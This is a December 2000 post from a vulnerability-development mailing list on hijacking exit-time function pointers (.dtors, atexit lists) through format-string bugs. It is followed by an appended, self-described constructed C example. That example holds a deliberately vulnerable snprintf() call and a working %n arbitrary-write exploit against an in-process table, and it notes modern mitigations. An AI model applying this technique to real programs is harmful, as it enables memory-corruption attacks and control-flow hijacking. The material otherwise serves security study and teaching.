Vulnerability Development mailing list archives

Re: Overwriting ELF .dtors section to modify program execution


From: Pascal Bouchareine <pb () HERT ORG>
Date: Sat, 16 Dec 2000 21:03:32 +0100

On Fri, Dec 15, 2000 at 12:46:22PM +0100, Mariusz Woloszyn wrote:
> It's good to remind that if the program calls exit() (most do) the fnlist is
> the best place to overwrite. As we described it in our Phrack article
> (http://phrack.infonexus.com/search.phtml?view&article=p56-5):

Which anyone here should read if they have not already; really great.

"The fnlist address is dependent on the libc library, so it
will be the same for every process on a particular machine."

So true. I wrote a little note about "abusing" atexit() via an argv[]-like
structure (which is very similar to the fnlist one..). I attach this
poor thing below, ftip.

Olaf Kirch was one of the first people to mention that an offset was
not needed when locally exploiting bugs, given our ability to pass
arguments/env vars to a vulnerable program and to guess quite exactly
where they will reside in the process's memory.

This makes format bugs especially clean and easy to exploit.

Sorry for the attachment thing, I have no place to put it online for
the time being.

--
Kalou.
                             ldiq    t0, 0xbeeffedadeadbabe

Attachment: heap_atexit.txt
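The write primitive the thread is about, as an added example that is not part of the original message, the attachment, or the Phrack article: a deliberately vulnerable function passes attacker input straight to snprintf(), and the "exploit" uses %n to plant a chosen value in a writable slot, standing in for a .dtors entry or an atexit() fnlist entry. Everything in it is constructed: the names vuln(), fnlist, find_buf_slot(), pick_victim() and exploit() are mine, the victim array is a plain int table rather than real libc data, and the address is found by probing from inside the same process instead of being staged in argv/env at a predicted stack address as the message describes for the local case. It assumes a 64-bit Linux/glibc build; the #undef at the top turns off fortify, which otherwise refuses %n in a writable format string.

```c
/* Added example: format-string arbitrary write (constructed, not from the thread).
 * Build: cc -o fmtwrite fmtwrite.c && ./fmtwrite */
#undef _FORTIFY_SOURCE          /* fortify aborts on %n in writable formats */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#define NSLOTS (1 << 20)        /* 4 MB of victim slots, see pick_victim() */
#define VALUE  57005            /* 0xdead: the value we want to plant */
#define PREFIX 32               /* directive prefix padded to this many bytes */

/* Constructed victim memory: stands in for a writable table of exit-time
 * function pointers (.dtors / atexit list). Each slot is an int so one %n
 * write suffices; a real 8-byte pointer needs two or four %hn writes. */
static volatile int fnlist[NSLOTS];

/* Where the vulnerable function renders its output (large enough for VALUE). */
static char out[1 << 17];

/* The bug, intentionally: attacker input is copied into a stack buffer and
 * then used directly as the format string. */
__attribute__((noinline))
static void vuln(const char *input, size_t len)
{
    char buf[256];
    memset(buf, 0, sizeof buf);
    if (len > sizeof buf - 1) len = sizeof buf - 1;
    memcpy(buf, input, len);
    snprintf(out, sizeof out, buf);      /* format-string bug */
}

/* Step 1: find which variadic-argument slot overlaps buf[0]. Send a marker of
 * 'A' bytes followed by "%k$p" and look for the marker echoed as a pointer. */
static int find_buf_slot(void)
{
    void *marker;
    char expect[32], fmt[64];
    memset(&marker, 'A', sizeof marker);
    snprintf(expect, sizeof expect, "%p", marker);   /* 0x4141414141414141 */

    for (int k = 1; k < 96; k++) {
        int n = snprintf(fmt, sizeof fmt, "AAAAAAAA%%%d$p", k);
        vuln(fmt, (size_t)n);
        if (strcmp(out + 8, expect) == 0)
            return k;
    }
    return -1;
}

/* Step 2a: pick a victim slot whose address contains no '%' byte, since the
 * raw address rides inside the format string and '%' would start a directive.
 * NUL bytes are fine because the address is placed last. */
static int pick_victim(void)
{
    for (int i = 0; i < NSLOTS; i++) {
        uintptr_t a = (uintptr_t)&fnlist[i];
        int ok = 1;
        for (size_t b = 0; b < sizeof a; b++)
            if (((a >> (8 * b)) & 0xff) == '%') ok = 0;
        if (ok) return i;
    }
    return -1;
}

/* Step 2b: "%1$<VALUE>c" emits VALUE characters, then "%j$n" stores that
 * count through the pointer found in slot j. The prefix is padded to PREFIX
 * bytes, so the address appended right after it lands in slot
 * j = k + PREFIX / sizeof(void *). Returns 0 when the slot now holds VALUE. */
static int exploit(void)
{
    int k = find_buf_slot();
    int i = pick_victim();
    if (k < 0 || i < 0) return -1;

    int j = k + PREFIX / (int)sizeof(void *);
    char payload[PREFIX + sizeof(void *)];
    int n = snprintf(payload, sizeof payload, "%%1$%dc%%%d$n", VALUE, j);
    if (n < 0 || n > PREFIX) return -1;
    memset(payload + n, ' ', PREFIX - n);        /* literal padding */
    volatile int *addr = &fnlist[i];
    memcpy(payload + PREFIX, &addr, sizeof addr); /* raw little-endian pointer */

    fnlist[i] = 0;
    vuln(payload, sizeof payload);
    return fnlist[i] == VALUE ? 0 : 1;
}

int main(void)
{
    int rc = exploit();
    printf("format-string write %s\n", rc == 0 ? "succeeded" : "failed");
    return rc;
}
```

Against a real target the same two steps apply, except that the address and any shellcode are staged in argv/env (at an address that, as the message notes, is predictable locally when the stack is not randomised) and the victim is an exit-time pointer. Current toolchains close most of this route: full RELRO maps .fini_array read-only, glibc mangles the function pointers in its atexit list, ASLR moves the stack, and fortified builds reject %n in writable format strings.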